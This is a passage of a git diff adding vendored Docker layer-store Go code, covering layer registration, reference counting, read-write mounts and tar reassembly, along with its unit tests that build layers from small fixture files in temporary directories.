reconstruct stream + io.Copy(ioutil.Discard, rdr) // ignore error as reader may be closed + + layer.size = applySize + layer.diffID = DiffID(digester.Digest()) + + logrus.Debugf("Applied tar %s to %s, size: %d", layer.diffID, layer.cacheID, applySize) + + return nil +} + +func (ls *layerStore) Register(ts io.Reader, parent ChainID) (Layer, error) { + return ls.registerWithDescriptor(ts, parent, distribution.Descriptor{}) +} + +func (ls *layerStore) registerWithDescriptor(ts io.Reader, parent ChainID, descriptor distribution.Descriptor) (Layer, error) { + // err is used to hold the error which will always trigger + // cleanup of creates sources but may not be an error returned + // to the caller (already exists). 
+ var err error + var pid string + var p *roLayer + if string(parent) != "" { + p = ls.get(parent) + if p == nil { + return nil, ErrLayerDoesNotExist + } + pid = p.cacheID + // Release parent chain if error + defer func() { + if err != nil { + ls.layerL.Lock() + ls.releaseLayer(p) + ls.layerL.Unlock() + } + }() + if p.depth() >= maxLayerDepth { + err = ErrMaxDepthExceeded + return nil, err + } + } + + // Create new roLayer + layer := &roLayer{ + parent: p, + cacheID: stringid.GenerateRandomID(), + referenceCount: 1, + layerStore: ls, + references: map[Layer]struct{}{}, + descriptor: descriptor, + } + + if err = ls.driver.Create(layer.cacheID, pid, nil); err != nil { + return nil, err + } + + tx, err := ls.store.StartTransaction() + if err != nil { + return nil, err + } + + defer func() { + if err != nil { + logrus.Debugf("Cleaning up layer %s: %v", layer.cacheID, err) + if err := ls.driver.Remove(layer.cacheID); err != nil { + logrus.Errorf("Error cleaning up cache layer %s: %v", layer.cacheID, err) + } + if err := tx.Cancel(); err != nil { + logrus.Errorf("Error canceling metadata transaction %q: %s", tx.String(), err) + } + } + }() + + if err = ls.applyTar(tx, ts, pid, layer); err != nil { + return nil, err + } + + if layer.parent == nil { + layer.chainID = ChainID(layer.diffID) + } else { + layer.chainID = createChainIDFromParent(layer.parent.chainID, layer.diffID) + } + + if err = storeLayer(tx, layer); err != nil { + return nil, err + } + + ls.layerL.Lock() + defer ls.layerL.Unlock() + + if existingLayer := ls.getWithoutLock(layer.chainID); existingLayer != nil { + // Set error for cleanup, but do not return the error + err = errors.New("layer already exists") + return existingLayer.getReference(), nil + } + + if err = tx.Commit(layer.chainID); err != nil { + return nil, err + } + + ls.layerMap[layer.chainID] = layer + + return layer.getReference(), nil +} + +func (ls *layerStore) getWithoutLock(layer ChainID) *roLayer { + l, ok := ls.layerMap[layer] + if !ok 
{ + return nil + } + + l.referenceCount++ + + return l +} + +func (ls *layerStore) get(l ChainID) *roLayer { + ls.layerL.Lock() + defer ls.layerL.Unlock() + return ls.getWithoutLock(l) +} + +func (ls *layerStore) Get(l ChainID) (Layer, error) { + ls.layerL.Lock() + defer ls.layerL.Unlock() + + layer := ls.getWithoutLock(l) + if layer == nil { + return nil, ErrLayerDoesNotExist + } + + return layer.getReference(), nil +} + +func (ls *layerStore) Map() map[ChainID]Layer { + ls.layerL.Lock() + defer ls.layerL.Unlock() + + layers := map[ChainID]Layer{} + + for k, v := range ls.layerMap { + layers[k] = v + } + + return layers +} + +func (ls *layerStore) deleteLayer(layer *roLayer, metadata *Metadata) error { + err := ls.driver.Remove(layer.cacheID) + if err != nil { + return err + } + + err = ls.store.Remove(layer.chainID) + if err != nil { + return err + } + metadata.DiffID = layer.diffID + metadata.ChainID = layer.chainID + metadata.Size, err = layer.Size() + if err != nil { + return err + } + metadata.DiffSize = layer.size + + return nil +} + +func (ls *layerStore) releaseLayer(l *roLayer) ([]Metadata, error) { + depth := 0 + removed := []Metadata{} + for { + if l.referenceCount == 0 { + panic("layer not retained") + } + l.referenceCount-- + if l.referenceCount != 0 { + return removed, nil + } + + if len(removed) == 0 && depth > 0 { + panic("cannot remove layer with child") + } + if l.hasReferences() { + panic("cannot delete referenced layer") + } + var metadata Metadata + if err := ls.deleteLayer(l, &metadata); err != nil { + return nil, err + } + + delete(ls.layerMap, l.chainID) + removed = append(removed, metadata) + + if l.parent == nil { + return removed, nil + } + + depth++ + l = l.parent + } +} + +func (ls *layerStore) Release(l Layer) ([]Metadata, error) { + ls.layerL.Lock() + defer ls.layerL.Unlock() + layer, ok := ls.layerMap[l.ChainID()] + if !ok { + return []Metadata{}, nil + } + if !layer.hasReference(l) { + return nil, ErrLayerNotRetained + } + + 
layer.deleteReference(l) + + return ls.releaseLayer(layer) +} + +func (ls *layerStore) CreateRWLayer(name string, parent ChainID, mountLabel string, initFunc MountInit, storageOpt map[string]string) (RWLayer, error) { + ls.mountL.Lock() + defer ls.mountL.Unlock() + m, ok := ls.mounts[name] + if ok { + return nil, ErrMountNameConflict + } + + var err error + var pid string + var p *roLayer + if string(parent) != "" { + p = ls.get(parent) + if p == nil { + return nil, ErrLayerDoesNotExist + } + pid = p.cacheID + + // Release parent chain if error + defer func() { + if err != nil { + ls.layerL.Lock() + ls.releaseLayer(p) + ls.layerL.Unlock() + } + }() + } + + m = &mountedLayer{ + name: name, + parent: p, + mountID: ls.mountID(name), + layerStore: ls, + references: map[RWLayer]*referencedRWLayer{}, + } + + if initFunc != nil { + pid, err = ls.initMount(m.mountID, pid, mountLabel, initFunc, storageOpt) + if err != nil { + return nil, err + } + m.initID = pid + } + + createOpts := &graphdriver.CreateOpts{ + StorageOpt: storageOpt, + } + + if err = ls.driver.CreateReadWrite(m.mountID, pid, createOpts); err != nil { + return nil, err + } + + if err = ls.saveMount(m); err != nil { + return nil, err + } + + return m.getReference(), nil +} + +func (ls *layerStore) GetRWLayer(id string) (RWLayer, error) { + ls.mountL.Lock() + defer ls.mountL.Unlock() + mount, ok := ls.mounts[id] + if !ok { + return nil, ErrMountDoesNotExist + } + + return mount.getReference(), nil +} + +func (ls *layerStore) GetMountID(id string) (string, error) { + ls.mountL.Lock() + defer ls.mountL.Unlock() + mount, ok := ls.mounts[id] + if !ok { + return "", ErrMountDoesNotExist + } + logrus.Debugf("GetMountID id: %s -> mountID: %s", id, mount.mountID) + + return mount.mountID, nil +} + +func (ls *layerStore) ReleaseRWLayer(l RWLayer) ([]Metadata, error) { + ls.mountL.Lock() + defer ls.mountL.Unlock() + m, ok := ls.mounts[l.Name()] + if !ok { + return []Metadata{}, nil + } + + if err := 
m.deleteReference(l); err != nil { + return nil, err + } + + if m.hasReferences() { + return []Metadata{}, nil + } + + if err := ls.driver.Remove(m.mountID); err != nil { + logrus.Errorf("Error removing mounted layer %s: %s", m.name, err) + m.retakeReference(l) + return nil, err + } + + if m.initID != "" { + if err := ls.driver.Remove(m.initID); err != nil { + logrus.Errorf("Error removing init layer %s: %s", m.name, err) + m.retakeReference(l) + return nil, err + } + } + + if err := ls.store.RemoveMount(m.name); err != nil { + logrus.Errorf("Error removing mount metadata: %s: %s", m.name, err) + m.retakeReference(l) + return nil, err + } + + delete(ls.mounts, m.Name()) + + ls.layerL.Lock() + defer ls.layerL.Unlock() + if m.parent != nil { + return ls.releaseLayer(m.parent) + } + + return []Metadata{}, nil +} + +func (ls *layerStore) saveMount(mount *mountedLayer) error { + if err := ls.store.SetMountID(mount.name, mount.mountID); err != nil { + return err + } + + if mount.initID != "" { + if err := ls.store.SetInitID(mount.name, mount.initID); err != nil { + return err + } + } + + if mount.parent != nil { + if err := ls.store.SetMountParent(mount.name, mount.parent.chainID); err != nil { + return err + } + } + + ls.mounts[mount.name] = mount + + return nil +} + +func (ls *layerStore) initMount(graphID, parent, mountLabel string, initFunc MountInit, storageOpt map[string]string) (string, error) { + // Use "-init" to maintain compatibility with graph drivers + // which are expecting this layer with this special name. If all + // graph drivers can be updated to not rely on knowing about this layer + // then the initID should be randomly generated. 
+ initID := fmt.Sprintf("%s-init", graphID) + + createOpts := &graphdriver.CreateOpts{ + MountLabel: mountLabel, + StorageOpt: storageOpt, + } + + if err := ls.driver.CreateReadWrite(initID, parent, createOpts); err != nil { + return "", err + } + p, err := ls.driver.Get(initID, "") + if err != nil { + return "", err + } + + if err := initFunc(p); err != nil { + ls.driver.Put(initID) + return "", err + } + + if err := ls.driver.Put(initID); err != nil { + return "", err + } + + return initID, nil +} + +func (ls *layerStore) assembleTarTo(graphID string, metadata io.ReadCloser, size *int64, w io.Writer) error { + diffDriver, ok := ls.driver.(graphdriver.DiffGetterDriver) + if !ok { + diffDriver = &naiveDiffPathDriver{ls.driver} + } + + defer metadata.Close() + + // get our relative path to the container + fileGetCloser, err := diffDriver.DiffGetter(graphID) + if err != nil { + return err + } + defer fileGetCloser.Close() + + metaUnpacker := storage.NewJSONUnpacker(metadata) + upackerCounter := &unpackSizeCounter{metaUnpacker, size} + logrus.Debugf("Assembling tar data for %s", graphID) + return asm.WriteOutputTarStream(fileGetCloser, upackerCounter, w) +} + +func (ls *layerStore) Cleanup() error { + return ls.driver.Cleanup() +} + +func (ls *layerStore) DriverStatus() [][2]string { + return ls.driver.Status() +} + +func (ls *layerStore) DriverName() string { + return ls.driver.String() +} + +type naiveDiffPathDriver struct { + graphdriver.Driver +} + +type fileGetPutter struct { + storage.FileGetter + driver graphdriver.Driver + id string +} + +func (w *fileGetPutter) Close() error { + return w.driver.Put(w.id) +} + +func (n *naiveDiffPathDriver) DiffGetter(id string) (graphdriver.FileGetCloser, error) { + p, err := n.Driver.Get(id, "") + if err != nil { + return nil, err + } + return &fileGetPutter{storage.NewPathFileGetter(p), n.Driver, id}, nil +} diff --git a/vendor/github.com/docker/docker/layer/layer_store_windows.go 
b/vendor/github.com/docker/docker/layer/layer_store_windows.go new file mode 100644 index 0000000000..1276a912cc --- /dev/null +++ b/vendor/github.com/docker/docker/layer/layer_store_windows.go @@ -0,0 +1,11 @@ +package layer + +import ( + "io" + + "github.com/docker/distribution" +) + +func (ls *layerStore) RegisterWithDescriptor(ts io.Reader, parent ChainID, descriptor distribution.Descriptor) (Layer, error) { + return ls.registerWithDescriptor(ts, parent, descriptor) +} diff --git a/vendor/github.com/docker/docker/layer/layer_test.go b/vendor/github.com/docker/docker/layer/layer_test.go new file mode 100644 index 0000000000..10712df998 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/layer_test.go @@ -0,0 +1,771 @@ +package layer + +import ( + "bytes" + "io" + "io/ioutil" + "os" + "path/filepath" + "runtime" + "strings" + "testing" + + "github.com/docker/distribution/digest" + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/daemon/graphdriver/vfs" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/stringid" +) + +func init() { + graphdriver.ApplyUncompressedLayer = archive.UnpackLayer + vfs.CopyWithTar = archive.CopyWithTar +} + +func newVFSGraphDriver(td string) (graphdriver.Driver, error) { + uidMap := []idtools.IDMap{ + { + ContainerID: 0, + HostID: os.Getuid(), + Size: 1, + }, + } + gidMap := []idtools.IDMap{ + { + ContainerID: 0, + HostID: os.Getgid(), + Size: 1, + }, + } + + options := graphdriver.Options{Root: td, UIDMaps: uidMap, GIDMaps: gidMap} + return graphdriver.GetDriver("vfs", nil, options) +} + +func newTestGraphDriver(t *testing.T) (graphdriver.Driver, func()) { + td, err := ioutil.TempDir("", "graph-") + if err != nil { + t.Fatal(err) + } + + driver, err := newVFSGraphDriver(td) + if err != nil { + t.Fatal(err) + } + + return driver, func() { + os.RemoveAll(td) + } +} + +func newTestStore(t *testing.T) (Store, string, func()) { + td, err := 
ioutil.TempDir("", "layerstore-") + if err != nil { + t.Fatal(err) + } + + graph, graphcleanup := newTestGraphDriver(t) + fms, err := NewFSMetadataStore(td) + if err != nil { + t.Fatal(err) + } + ls, err := NewStoreFromGraphDriver(fms, graph) + if err != nil { + t.Fatal(err) + } + + return ls, td, func() { + graphcleanup() + os.RemoveAll(td) + } +} + +type layerInit func(root string) error + +func createLayer(ls Store, parent ChainID, layerFunc layerInit) (Layer, error) { + containerID := stringid.GenerateRandomID() + mount, err := ls.CreateRWLayer(containerID, parent, "", nil, nil) + if err != nil { + return nil, err + } + + path, err := mount.Mount("") + if err != nil { + return nil, err + } + + if err := layerFunc(path); err != nil { + return nil, err + } + + ts, err := mount.TarStream() + if err != nil { + return nil, err + } + defer ts.Close() + + layer, err := ls.Register(ts, parent) + if err != nil { + return nil, err + } + + if err := mount.Unmount(); err != nil { + return nil, err + } + + if _, err := ls.ReleaseRWLayer(mount); err != nil { + return nil, err + } + + return layer, nil +} + +type FileApplier interface { + ApplyFile(root string) error +} + +type testFile struct { + name string + content []byte + permission os.FileMode +} + +func newTestFile(name string, content []byte, perm os.FileMode) FileApplier { + return &testFile{ + name: name, + content: content, + permission: perm, + } +} + +func (tf *testFile) ApplyFile(root string) error { + fullPath := filepath.Join(root, tf.name) + if err := os.MkdirAll(filepath.Dir(fullPath), 0755); err != nil { + return err + } + // Check if already exists + if stat, err := os.Stat(fullPath); err == nil && stat.Mode().Perm() != tf.permission { + if err := os.Chmod(fullPath, tf.permission); err != nil { + return err + } + } + if err := ioutil.WriteFile(fullPath, tf.content, tf.permission); err != nil { + return err + } + return nil +} + +func initWithFiles(files ...FileApplier) layerInit { + return func(root 
string) error { + for _, f := range files { + if err := f.ApplyFile(root); err != nil { + return err + } + } + return nil + } +} + +func getCachedLayer(l Layer) *roLayer { + if rl, ok := l.(*referencedCacheLayer); ok { + return rl.roLayer + } + return l.(*roLayer) +} + +func getMountLayer(l RWLayer) *mountedLayer { + return l.(*referencedRWLayer).mountedLayer +} + +func createMetadata(layers ...Layer) []Metadata { + metadata := make([]Metadata, len(layers)) + for i := range layers { + size, err := layers[i].Size() + if err != nil { + panic(err) + } + + metadata[i].ChainID = layers[i].ChainID() + metadata[i].DiffID = layers[i].DiffID() + metadata[i].Size = size + metadata[i].DiffSize = getCachedLayer(layers[i]).size + } + + return metadata +} + +func assertMetadata(t *testing.T, metadata, expectedMetadata []Metadata) { + if len(metadata) != len(expectedMetadata) { + t.Fatalf("Unexpected number of deletes %d, expected %d", len(metadata), len(expectedMetadata)) + } + + for i := range metadata { + if metadata[i] != expectedMetadata[i] { + t.Errorf("Unexpected metadata\n\tExpected: %#v\n\tActual: %#v", expectedMetadata[i], metadata[i]) + } + } + if t.Failed() { + t.FailNow() + } +} + +func releaseAndCheckDeleted(t *testing.T, ls Store, layer Layer, removed ...Layer) { + layerCount := len(ls.(*layerStore).layerMap) + expectedMetadata := createMetadata(removed...) 
+ metadata, err := ls.Release(layer) + if err != nil { + t.Fatal(err) + } + + assertMetadata(t, metadata, expectedMetadata) + + if expected := layerCount - len(removed); len(ls.(*layerStore).layerMap) != expected { + t.Fatalf("Unexpected number of layers %d, expected %d", len(ls.(*layerStore).layerMap), expected) + } +} + +func cacheID(l Layer) string { + return getCachedLayer(l).cacheID +} + +func assertLayerEqual(t *testing.T, l1, l2 Layer) { + if l1.ChainID() != l2.ChainID() { + t.Fatalf("Mismatched ID: %s vs %s", l1.ChainID(), l2.ChainID()) + } + if l1.DiffID() != l2.DiffID() { + t.Fatalf("Mismatched DiffID: %s vs %s", l1.DiffID(), l2.DiffID()) + } + + size1, err := l1.Size() + if err != nil { + t.Fatal(err) + } + + size2, err := l2.Size() + if err != nil { + t.Fatal(err) + } + + if size1 != size2 { + t.Fatalf("Mismatched size: %d vs %d", size1, size2) + } + + if cacheID(l1) != cacheID(l2) { + t.Fatalf("Mismatched cache id: %s vs %s", cacheID(l1), cacheID(l2)) + } + + p1 := l1.Parent() + p2 := l2.Parent() + if p1 != nil && p2 != nil { + assertLayerEqual(t, p1, p2) + } else if p1 != nil || p2 != nil { + t.Fatalf("Mismatched parents: %v vs %v", p1, p2) + } +} + +func TestMountAndRegister(t *testing.T) { + ls, _, cleanup := newTestStore(t) + defer cleanup() + + li := initWithFiles(newTestFile("testfile.txt", []byte("some test data"), 0644)) + layer, err := createLayer(ls, "", li) + if err != nil { + t.Fatal(err) + } + + size, _ := layer.Size() + t.Logf("Layer size: %d", size) + + mount2, err := ls.CreateRWLayer("new-test-mount", layer.ChainID(), "", nil, nil) + if err != nil { + t.Fatal(err) + } + + path2, err := mount2.Mount("") + if err != nil { + t.Fatal(err) + } + + b, err := ioutil.ReadFile(filepath.Join(path2, "testfile.txt")) + if err != nil { + t.Fatal(err) + } + + if expected := "some test data"; string(b) != expected { + t.Fatalf("Wrong file data, expected %q, got %q", expected, string(b)) + } + + if err := mount2.Unmount(); err != nil { + t.Fatal(err) + 
} + + if _, err := ls.ReleaseRWLayer(mount2); err != nil { + t.Fatal(err) + } +} + +func TestLayerRelease(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + ls, _, cleanup := newTestStore(t) + defer cleanup() + + layer1, err := createLayer(ls, "", initWithFiles(newTestFile("layer1.txt", []byte("layer 1 file"), 0644))) + if err != nil { + t.Fatal(err) + } + + layer2, err := createLayer(ls, layer1.ChainID(), initWithFiles(newTestFile("layer2.txt", []byte("layer 2 file"), 0644))) + if err != nil { + t.Fatal(err) + } + + if _, err := ls.Release(layer1); err != nil { + t.Fatal(err) + } + + layer3a, err := createLayer(ls, layer2.ChainID(), initWithFiles(newTestFile("layer3.txt", []byte("layer 3a file"), 0644))) + if err != nil { + t.Fatal(err) + } + + layer3b, err := createLayer(ls, layer2.ChainID(), initWithFiles(newTestFile("layer3.txt", []byte("layer 3b file"), 0644))) + if err != nil { + t.Fatal(err) + } + + if _, err := ls.Release(layer2); err != nil { + t.Fatal(err) + } + + t.Logf("Layer1: %s", layer1.ChainID()) + t.Logf("Layer2: %s", layer2.ChainID()) + t.Logf("Layer3a: %s", layer3a.ChainID()) + t.Logf("Layer3b: %s", layer3b.ChainID()) + + if expected := 4; len(ls.(*layerStore).layerMap) != expected { + t.Fatalf("Unexpected number of layers %d, expected %d", len(ls.(*layerStore).layerMap), expected) + } + + releaseAndCheckDeleted(t, ls, layer3b, layer3b) + releaseAndCheckDeleted(t, ls, layer3a, layer3a, layer2, layer1) +} + +func TestStoreRestore(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + ls, _, cleanup := newTestStore(t) + defer cleanup() + + layer1, err := createLayer(ls, "", initWithFiles(newTestFile("layer1.txt", []byte("layer 1 file"), 0644))) + if err != nil { + t.Fatal(err) + } + + layer2, err := createLayer(ls, layer1.ChainID(), initWithFiles(newTestFile("layer2.txt", []byte("layer 
2 file"), 0644))) + if err != nil { + t.Fatal(err) + } + + if _, err := ls.Release(layer1); err != nil { + t.Fatal(err) + } + + layer3, err := createLayer(ls, layer2.ChainID(), initWithFiles(newTestFile("layer3.txt", []byte("layer 3 file"), 0644))) + if err != nil { + t.Fatal(err) + } + + if _, err := ls.Release(layer2); err != nil { + t.Fatal(err) + } + + m, err := ls.CreateRWLayer("some-mount_name", layer3.ChainID(), "", nil, nil) + if err != nil { + t.Fatal(err) + } + + path, err := m.Mount("") + if err != nil { + t.Fatal(err) + } + + if err := ioutil.WriteFile(filepath.Join(path, "testfile.txt"), []byte("nothing here"), 0644); err != nil { + t.Fatal(err) + } + + if err := m.Unmount(); err != nil { + t.Fatal(err) + } + + ls2, err := NewStoreFromGraphDriver(ls.(*layerStore).store, ls.(*layerStore).driver) + if err != nil { + t.Fatal(err) + } + + layer3b, err := ls2.Get(layer3.ChainID()) + if err != nil { + t.Fatal(err) + } + + assertLayerEqual(t, layer3b, layer3) + + // Create again with same name, should return error + if _, err := ls2.CreateRWLayer("some-mount_name", layer3b.ChainID(), "", nil, nil); err == nil { + t.Fatal("Expected error creating mount with same name") + } else if err != ErrMountNameConflict { + t.Fatal(err) + } + + m2, err := ls2.GetRWLayer("some-mount_name") + if err != nil { + t.Fatal(err) + } + + if mountPath, err := m2.Mount(""); err != nil { + t.Fatal(err) + } else if path != mountPath { + t.Fatalf("Unexpected path %s, expected %s", mountPath, path) + } + + if mountPath, err := m2.Mount(""); err != nil { + t.Fatal(err) + } else if path != mountPath { + t.Fatalf("Unexpected path %s, expected %s", mountPath, path) + } + if err := m2.Unmount(); err != nil { + t.Fatal(err) + } + + b, err := ioutil.ReadFile(filepath.Join(path, "testfile.txt")) + if err != nil { + t.Fatal(err) + } + if expected := "nothing here"; string(b) != expected { + t.Fatalf("Unexpected content %q, expected %q", string(b), expected) + } + + if err := m2.Unmount(); err != 
nil { + t.Fatal(err) + } + + if metadata, err := ls2.ReleaseRWLayer(m2); err != nil { + t.Fatal(err) + } else if len(metadata) != 0 { + t.Fatalf("Unexpectedly deleted layers: %#v", metadata) + } + + if metadata, err := ls2.ReleaseRWLayer(m2); err != nil { + t.Fatal(err) + } else if len(metadata) != 0 { + t.Fatalf("Unexpectedly deleted layers: %#v", metadata) + } + + releaseAndCheckDeleted(t, ls2, layer3b, layer3, layer2, layer1) +} + +func TestTarStreamStability(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + ls, _, cleanup := newTestStore(t) + defer cleanup() + + files1 := []FileApplier{ + newTestFile("/etc/hosts", []byte("mydomain 10.0.0.1"), 0644), + newTestFile("/etc/profile", []byte("PATH=/usr/bin"), 0644), + } + addedFile := newTestFile("/etc/shadow", []byte("root:::::::"), 0644) + files2 := []FileApplier{ + newTestFile("/etc/hosts", []byte("mydomain 10.0.0.2"), 0644), + newTestFile("/etc/profile", []byte("PATH=/usr/bin"), 0664), + newTestFile("/root/.bashrc", []byte("PATH=/usr/sbin:/usr/bin"), 0644), + } + + tar1, err := tarFromFiles(files1...) + if err != nil { + t.Fatal(err) + } + + tar2, err := tarFromFiles(files2...) 
+ if err != nil { + t.Fatal(err) + } + + layer1, err := ls.Register(bytes.NewReader(tar1), "") + if err != nil { + t.Fatal(err) + } + + // hack layer to add file + p, err := ls.(*layerStore).driver.Get(layer1.(*referencedCacheLayer).cacheID, "") + if err != nil { + t.Fatal(err) + } + + if err := addedFile.ApplyFile(p); err != nil { + t.Fatal(err) + } + + if err := ls.(*layerStore).driver.Put(layer1.(*referencedCacheLayer).cacheID); err != nil { + t.Fatal(err) + } + + layer2, err := ls.Register(bytes.NewReader(tar2), layer1.ChainID()) + if err != nil { + t.Fatal(err) + } + + id1 := layer1.ChainID() + t.Logf("Layer 1: %s", layer1.ChainID()) + t.Logf("Layer 2: %s", layer2.ChainID()) + + if _, err := ls.Release(layer1); err != nil { + t.Fatal(err) + } + + assertLayerDiff(t, tar2, layer2) + + layer1b, err := ls.Get(id1) + if err != nil { + t.Logf("Content of layer map: %#v", ls.(*layerStore).layerMap) + t.Fatal(err) + } + + if _, err := ls.Release(layer2); err != nil { + t.Fatal(err) + } + + assertLayerDiff(t, tar1, layer1b) + + if _, err := ls.Release(layer1b); err != nil { + t.Fatal(err) + } +} + +func assertLayerDiff(t *testing.T, expected []byte, layer Layer) { + expectedDigest := digest.FromBytes(expected) + + if digest.Digest(layer.DiffID()) != expectedDigest { + t.Fatalf("Mismatched diff id for %s, got %s, expected %s", layer.ChainID(), layer.DiffID(), expected) + } + + ts, err := layer.TarStream() + if err != nil { + t.Fatal(err) + } + defer ts.Close() + + actual, err := ioutil.ReadAll(ts) + if err != nil { + t.Fatal(err) + } + + if len(actual) != len(expected) { + logByteDiff(t, actual, expected) + t.Fatalf("Mismatched tar stream size for %s, got %d, expected %d", layer.ChainID(), len(actual), len(expected)) + } + + actualDigest := digest.FromBytes(actual) + + if actualDigest != expectedDigest { + logByteDiff(t, actual, expected) + t.Fatalf("Wrong digest of tar stream, got %s, expected %s", actualDigest, expectedDigest) + } +} + +const maxByteLog = 4 * 1024 + 
+func logByteDiff(t *testing.T, actual, expected []byte) { + d1, d2 := byteDiff(actual, expected) + if len(d1) == 0 && len(d2) == 0 { + return + } + + prefix := len(actual) - len(d1) + if len(d1) > maxByteLog || len(d2) > maxByteLog { + t.Logf("Byte diff after %d matching bytes", prefix) + } else { + t.Logf("Byte diff after %d matching bytes\nActual bytes after prefix:\n%x\nExpected bytes after prefix:\n%x", prefix, d1, d2) + } +} + +// byteDiff returns the differing bytes after the matching prefix +func byteDiff(b1, b2 []byte) ([]byte, []byte) { + i := 0 + for i < len(b1) && i < len(b2) { + if b1[i] != b2[i] { + break + } + i++ + } + + return b1[i:], b2[i:] +} + +func tarFromFiles(files ...FileApplier) ([]byte, error) { + td, err := ioutil.TempDir("", "tar-") + if err != nil { + return nil, err + } + defer os.RemoveAll(td) + + for _, f := range files { + if err := f.ApplyFile(td); err != nil { + return nil, err + } + } + + r, err := archive.Tar(td, archive.Uncompressed) + if err != nil { + return nil, err + } + + buf := bytes.NewBuffer(nil) + if _, err := io.Copy(buf, r); err != nil { + return nil, err + } + + return buf.Bytes(), nil +} + +// assertReferences asserts that all the references are to the same +// image and represent the full set of references to that image. 
+func assertReferences(t *testing.T, references ...Layer) { + if len(references) == 0 { + return + } + base := references[0].(*referencedCacheLayer).roLayer + seenReferences := map[Layer]struct{}{ + references[0]: {}, + } + for i := 1; i < len(references); i++ { + other := references[i].(*referencedCacheLayer).roLayer + if base != other { + t.Fatalf("Unexpected referenced cache layer %s, expecting %s", other.ChainID(), base.ChainID()) + } + if _, ok := base.references[references[i]]; !ok { + t.Fatalf("Reference not part of reference list: %v", references[i]) + } + if _, ok := seenReferences[references[i]]; ok { + t.Fatalf("Duplicated reference %v", references[i]) + } + } + if rc := len(base.references); rc != len(references) { + t.Fatalf("Unexpected number of references %d, expecting %d", rc, len(references)) + } +} + +func TestRegisterExistingLayer(t *testing.T) { + ls, _, cleanup := newTestStore(t) + defer cleanup() + + baseFiles := []FileApplier{ + newTestFile("/etc/profile", []byte("# Base configuration"), 0644), + } + + layerFiles := []FileApplier{ + newTestFile("/root/.bashrc", []byte("# Root configuration"), 0644), + } + + li := initWithFiles(baseFiles...) + layer1, err := createLayer(ls, "", li) + if err != nil { + t.Fatal(err) + } + + tar1, err := tarFromFiles(layerFiles...) 
+ if err != nil { + t.Fatal(err) + } + + layer2a, err := ls.Register(bytes.NewReader(tar1), layer1.ChainID()) + if err != nil { + t.Fatal(err) + } + + layer2b, err := ls.Register(bytes.NewReader(tar1), layer1.ChainID()) + if err != nil { + t.Fatal(err) + } + + assertReferences(t, layer2a, layer2b) +} + +func TestTarStreamVerification(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + ls, tmpdir, cleanup := newTestStore(t) + defer cleanup() + + files1 := []FileApplier{ + newTestFile("/foo", []byte("abc"), 0644), + newTestFile("/bar", []byte("def"), 0644), + } + files2 := []FileApplier{ + newTestFile("/foo", []byte("abc"), 0644), + newTestFile("/bar", []byte("def"), 0600), // different perm + } + + tar1, err := tarFromFiles(files1...) + if err != nil { + t.Fatal(err) + } + + tar2, err := tarFromFiles(files2...) + if err != nil { + t.Fatal(err) + } + + layer1, err := ls.Register(bytes.NewReader(tar1), "") + if err != nil { + t.Fatal(err) + } + + layer2, err := ls.Register(bytes.NewReader(tar2), "") + if err != nil { + t.Fatal(err) + } + id1 := digest.Digest(layer1.ChainID()) + id2 := digest.Digest(layer2.ChainID()) + + // Replace tar data files + src, err := os.Open(filepath.Join(tmpdir, id1.Algorithm().String(), id1.Hex(), "tar-split.json.gz")) + if err != nil { + t.Fatal(err) + } + defer src.Close() + + dst, err := os.Create(filepath.Join(tmpdir, id2.Algorithm().String(), id2.Hex(), "tar-split.json.gz")) + if err != nil { + t.Fatal(err) + } + defer dst.Close() + + if _, err := io.Copy(dst, src); err != nil { + t.Fatal(err) + } + + src.Sync() + dst.Sync() + + ts, err := layer2.TarStream() + if err != nil { + t.Fatal(err) + } + _, err = io.Copy(ioutil.Discard, ts) + if err == nil { + t.Fatal("expected data verification to fail") + } + if !strings.Contains(err.Error(), "could not verify layer data") { + t.Fatalf("wrong error returned from tarstream: %q", err) + } +} diff --git 
a/vendor/github.com/docker/docker/layer/layer_unix.go b/vendor/github.com/docker/docker/layer/layer_unix.go new file mode 100644 index 0000000000..776b78ac02 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/layer_unix.go @@ -0,0 +1,9 @@ +// +build linux freebsd darwin openbsd solaris + +package layer + +import "github.com/docker/docker/pkg/stringid" + +func (ls *layerStore) mountID(name string) string { + return stringid.GenerateRandomID() +} diff --git a/vendor/github.com/docker/docker/layer/layer_unix_test.go b/vendor/github.com/docker/docker/layer/layer_unix_test.go new file mode 100644 index 0000000000..9aa1afd597 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/layer_unix_test.go @@ -0,0 +1,71 @@ +// +build !windows + +package layer + +import "testing" + +func graphDiffSize(ls Store, l Layer) (int64, error) { + cl := getCachedLayer(l) + var parent string + if cl.parent != nil { + parent = cl.parent.cacheID + } + return ls.(*layerStore).driver.DiffSize(cl.cacheID, parent) +} + +// Unix as Windows graph driver does not support Changes which is indirectly +// invoked by calling DiffSize on the driver +func TestLayerSize(t *testing.T) { + ls, _, cleanup := newTestStore(t) + defer cleanup() + + content1 := []byte("Base contents") + content2 := []byte("Added contents") + + layer1, err := createLayer(ls, "", initWithFiles(newTestFile("file1", content1, 0644))) + if err != nil { + t.Fatal(err) + } + + layer2, err := createLayer(ls, layer1.ChainID(), initWithFiles(newTestFile("file2", content2, 0644))) + if err != nil { + t.Fatal(err) + } + + layer1DiffSize, err := graphDiffSize(ls, layer1) + if err != nil { + t.Fatal(err) + } + + if int(layer1DiffSize) != len(content1) { + t.Fatalf("Unexpected diff size %d, expected %d", layer1DiffSize, len(content1)) + } + + layer1Size, err := layer1.Size() + if err != nil { + t.Fatal(err) + } + + if expected := len(content1); int(layer1Size) != expected { + t.Fatalf("Unexpected size %d, expected %d", layer1Size, 
